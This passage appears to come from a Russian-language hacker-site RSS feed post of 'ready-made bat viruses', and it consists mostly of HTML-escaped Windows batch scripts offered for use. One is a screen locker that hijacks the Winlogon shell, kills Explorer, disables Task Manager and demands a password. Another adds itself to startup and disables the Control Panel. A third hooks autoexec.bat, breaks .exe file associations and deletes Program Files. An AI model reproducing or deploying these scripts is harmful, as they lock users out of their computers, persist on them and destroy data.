компьютер можно введя код 200393!(Но он не разблокирует)&lt;br&gt;&lt;/span&gt;&lt;br&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;@echo off &lt;br&gt;CHCP 1251 &lt;br&gt;cls &lt;br&gt;Set Yvaga=На вашем компьютере найден вирус. &lt;br&gt;Set pass=Пароль &lt;br&gt;Set pas=Введите пароль. &lt;br&gt;Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль &lt;br&gt;Set dim=Выключаю вирус... &lt;br&gt;title Внимание!!! &lt;br&gt;CHCP 866 &lt;br&gt;IF EXIST C:&amp;#92;windows&amp;#92;boot.bat ( &lt;br&gt;goto ok ) &lt;br&gt;cls &lt;br&gt;IF NOT EXIST C:&amp;#92;windows&amp;#92;boot.bat ( &lt;br&gt;ECHO Windows Registry Editor Version 5.00 &amp;gt;&amp;gt; C:&amp;#92;0.reg &lt;br&gt;ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg &lt;br&gt;ECHO [HKEY_LOCAL_MACHINE&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows NT&amp;#92;CurrentVersion&amp;#92;Winlogon] &amp;gt;&amp;gt; C:&amp;#92;0.reg &lt;br&gt;ECHO. &amp;gt;&amp;gt; C:&amp;#92;0.reg &lt;br&gt;ECHO &quot;Shell&quot;=&quot;Explorer.exe, C:&amp;#92;&amp;#92;windows&amp;#92;&amp;#92;boot.bat &quot; &amp;gt;&amp;gt; C:&amp;#92;0.reg &lt;br&gt;start/wait regedit -s C:&amp;#92;0.reg &lt;br&gt;del C:&amp;#92;0.reg &lt;br&gt;ECHO @echo off &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;ECHO C:&amp;#92;WINDOWS&amp;#92;system32&amp;#92;taskkill.exe /f /im Explorer.exe &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;ECHO
 reg add 
&quot;HKCU&amp;#92;software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;system&quot; /v 
DisableTaskMgr /t REG_DWORD /d 1 /f &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;ECHO start sys.bat &amp;gt;&amp;gt;C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;attrib +r +a +s +h C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;copy virus.bat c:&amp;#92;windows&amp;#92;sys.bat &lt;br&gt;attrib +r +a +s +h C:&amp;#92;windows&amp;#92;sys.bat &lt;br&gt;GOTO end) &lt;br&gt;:ok &lt;br&gt;cls &lt;br&gt;Echo %Yvaga% &lt;br&gt;echo. &lt;br&gt;echo %virus% &lt;br&gt;echo %pas% &lt;br&gt;set /a choise = 0 &lt;br&gt;set /p choise=%pass%: &lt;br&gt;if &quot;%choise%&quot; == &quot;101&quot; goto gold &lt;br&gt;if &quot;%choise%&quot; == &quot;200393&quot; goto status &lt;br&gt;exit &lt;br&gt;:status &lt;br&gt;echo %dim% &lt;br&gt;attrib -r -a -s -h C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;del C:&amp;#92;windows&amp;#92;boot.bat &lt;br&gt;attrib -r -a -s -h C:&amp;#92;windows&amp;#92;sys.bat &lt;br&gt;del C:&amp;#92;windows&amp;#92;sys.bat &lt;br&gt;cls &lt;br&gt;:gold &lt;br&gt;start C:&amp;#92; &lt;br&gt;:end &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;COLOR: #ff0000&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;Добавляет программу в автозагрузку ОС&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #a9a9a9; FONT-SIZE: 10pt&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;copy &quot;&quot;%0&quot;&quot; &quot;%SystemRoot%&amp;#92;system32&amp;#92;File.bat&quot; &lt;br&gt;reg add &quot;HKLM&amp;#92;SOFTWARE&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Run&quot; /v &quot;Filel&quot; /t REG_SZ /d &quot;%SystemRoot%&amp;#92;system32&amp;#92;File.bat&quot; /f &lt;br&gt;reg add HKCU&amp;#92;Software&amp;#92;Microsoft&amp;#92;Windows&amp;#92;CurrentVersion&amp;#92;Policies&amp;#92;Explorer /v NoControlPanel /t REG_DWORD /d 1 /f&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;FONT-FAMILY: Arial; COLOR: #ff0000; FONT-SIZE: 10pt&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt; color: rgb(169, 169, 169);&quot;&gt;Этот вирус,блокирует все программы,но интернет работает.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: Arial; font-size: 10pt; color: rgb(169, 169, 169);&quot;&gt;&lt;br&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-family: Arial; font-size: 13px;&quot;&gt;&lt;div&gt;@Echo off&amp;nbsp;&lt;/div&gt;&lt;div&gt;Echo Virus Loading&amp;nbsp;&lt;/div&gt;&lt;div&gt;Date 13.09.96&amp;nbsp;&lt;/div&gt;&lt;div&gt;If exist c:ski.bat goto abc&amp;nbsp;&lt;/div&gt;&lt;div&gt;Copy %0 c:ski.bat&amp;nbsp;&lt;/div&gt;&lt;div&gt;Attrib +h c:ski.bat&amp;nbsp;&lt;/div&gt;&lt;div&gt;Echo c:ski.bat &amp;gt;&amp;gt;autoexec.bat&amp;nbsp;&lt;/div&gt;&lt;div&gt;:abc&amp;nbsp;&lt;/div&gt;&lt;div&gt;md PRIDUROK&amp;nbsp;&lt;/div&gt;&lt;div&gt;md LUZER&amp;nbsp;&lt;/div&gt;&lt;div&gt;md DURAK&amp;nbsp;&lt;/div&gt;&lt;div&gt;md LAMER&amp;nbsp;&lt;/div&gt;&lt;div&gt;Label E: PRIDUROK&amp;nbsp;&lt;/div&gt;&lt;div&gt;assoc .exe=.mp3&amp;nbsp;&lt;/div&gt;&lt;div&gt;del c:Program Files/q&amp;nbsp;&lt;/div&gt;&lt;div&gt;Echo VIRUS LOAD &lt;br&gt;&lt;/div&gt;&lt;/span&gt;&lt;br&gt;</content:encoded>
			<link>http://hackerzone.ucoz.lv/news/gotovye_bat_virusy/2013-01-14-1</link>
			<category>*Bat Virus</category>
			<dc:creator>drill28</dc:creator>
			<guid>http://hackerzone.ucoz.lv/news/gotovye_bat_virusy/2013-01-14-1</guid>
			<pubDate>Mon, 14 Jan 2013 18:25:25 GMT</pubDate>
		</item>
	</channel>
</rss>